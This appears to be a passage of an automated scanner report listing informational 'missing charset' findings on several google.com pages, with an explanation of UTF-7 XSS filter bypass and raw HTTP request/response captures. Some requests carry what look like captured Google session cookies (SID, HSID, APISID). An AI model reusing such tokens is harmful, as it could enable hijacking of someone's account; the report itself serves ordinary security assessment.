If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
9.1. http://www.google.com/intl/en/privacy/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/intl/en/privacy/ |
Request
GET /intl/en/privacy/ HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: text/html Last-Modified: Mon, 05 Dec 2011 09:56:17 GMT Date: Tue, 06 Dec 2011 07:30:55 GMT Expires: Tue, 06 Dec 2011 07:30:55 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Connection: close
<!DOCTYPE html> <html lang="en"> <meta charset="utf-8"> <meta content="initial-scale=1, minimum-scale=1, width=device-width" name="viewport"> <title>Google Privacy Center</title> <link href="/intl/en/ ...[SNIP]...
|
9.2. http://www.google.com/logos/2011/thanksgiving.html
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/logos/2011/thanksgiving.html |
Request
GET /logos/2011/thanksgiving.html HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: text/html Last-Modified: Tue, 29 Nov 2011 20:12:25 GMT Date: Tue, 06 Dec 2011 07:31:31 GMT Expires: Tue, 06 Dec 2011 07:31:31 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Connection: close
<!doctype HTML><title>Thanksgiving 2011</title><style id=logo-styles>#hplogo{margin:0 auto}#logo-background{background:url(/logos/2011/thanksgiving11-logo-bg.png) 0 0;height:230px;margin:40px auto 0;o ...[SNIP]...
|
9.3. http://www.google.com/recaptcha
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha |
Request
GET /recaptcha HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: __utma=173272373.1194247649.1323153197.1323153197.1323153197.1; __utmb=173272373.1.10.1323153197; __utmc=173272373; __utmz=173272373.1323153197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PREF=ID=810b7e02f363f054:FF=0:TM=1323101452:LM=1323101452:S=YE3SrEw60NXiwZZo; NID=53=aFV4Q7lzlA4g6hZ9Rki3DYK8hz1kGzocOZJI_w6eu6JH96dgw9nfloRt3_epIdfu1eIfKEVGXPRaSeg1Gk3GPPiFOlJXq1zd78kLwVzQe98Ltf17rS5LHcjEaSV7RjqH; SID=DQAAAN4AAABOxcVOIe64XB4IDSBk50we4ADMhkfgwJ24ZFchXWED5m9jgoUCD-gzNoxTvoa7L8sT3kcKU21dRS7G-mfY_oNuln-d04c_vYrXYg6DOfgbePnpZGg0HjXXRHklNUIngxWRXfJDliGBCr6E7fsnNy0KZCYhEPWiD58sxgfliIu0ZdMb-I_76fh5GqJflIw10c4o33gacknvYck2VX0OBDtsqzrrswhFW83K-Feh0RR1oG1-vK1FKycexSutDkT58OJCM73iPrteYQHzMQpskrwwNyNU8W5iwW4FONtbnZnFpA; HSID=AkB-N4ozDLm5DGQwb; APISID=R5nZIIrTQ8g_RUzK/A-Dgpt3yN1aY4sHSD
|
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Dec 2011 06:41:26 GMT Expires: Tue, 06 Dec 2011 06:41:26 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 4516 Server: GSE
<html><head><title>reCAPTCHA: Stop Spam, Read Books</title> <link rel="stylesheet" href="/recaptcha/static/shared-media/styles.css" type="text/css"> <link rel="shortcut icon" href="/recaptcha/static/s ...[SNIP]...
|
9.4. http://www.google.com/recaptcha/api/noscript
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/api/noscript |
Request
GET /recaptcha/api/noscript HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 500 Internal Server Error Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Date: Tue, 06 Dec 2011 07:30:49 GMT Content-Type: text/html X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head></head><body><pre>An error occurred: Input error: k: Required field must not be blank
</pre></body></html> |
9.5. http://www.google.com/recaptcha/demo/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/demo/ |
Request
GET /recaptcha/demo/ HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/recaptcha/learnmore Cookie: PREF=ID=810b7e02f363f054:FF=0:TM=1323101452:LM=1323101452:S=YE3SrEw60NXiwZZo; NID=53=aFV4Q7lzlA4g6hZ9Rki3DYK8hz1kGzocOZJI_w6eu6JH96dgw9nfloRt3_epIdfu1eIfKEVGXPRaSeg1Gk3GPPiFOlJXq1zd78kLwVzQe98Ltf17rS5LHcjEaSV7RjqH
|
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Dec 2011 06:33:14 GMT Expires: Tue, 06 Dec 2011 06:33:14 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 1465 Server: GSE
<html><head><title></title> <style type="text/css"> body { font-family: Helvetica, sans-serif; color: #000000; font-size: 12px; border: none; background-c ...[SNIP]...
|
9.6. http://www.google.com/recaptcha/mailhide/d
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/mailhide/d |
Request
GET /recaptcha/mailhide/d HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Dec 2011 07:30:43 GMT Expires: Tue, 06 Dec 2011 07:30:43 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head><title>reCAPTCHA Mailhide: Free Spam Protection</title> <link rel="stylesheet" href="/recaptcha/mailhide/shared-media/styles.css" type="text/css"> <link rel="shortcut icon" href="/recaptch ...[SNIP]...
|
9.7. http://www.google.com/webmasters/
previous
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webmasters/ |
Request
GET /webmasters/ HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: text/html Last-Modified: Mon, 05 Dec 2011 07:45:21 GMT Date: Tue, 06 Dec 2011 07:31:18 GMT Expires: Tue, 06 Dec 2011 07:31:18 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Connection: close
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title> Google Webmaster Central. Get data about crawling, indexing and search traffic. Increase traffic to your si ...[SNIP]...
|
Report generated by XSS.Cx at Mon Jan 23 12:29:30 CST 2012.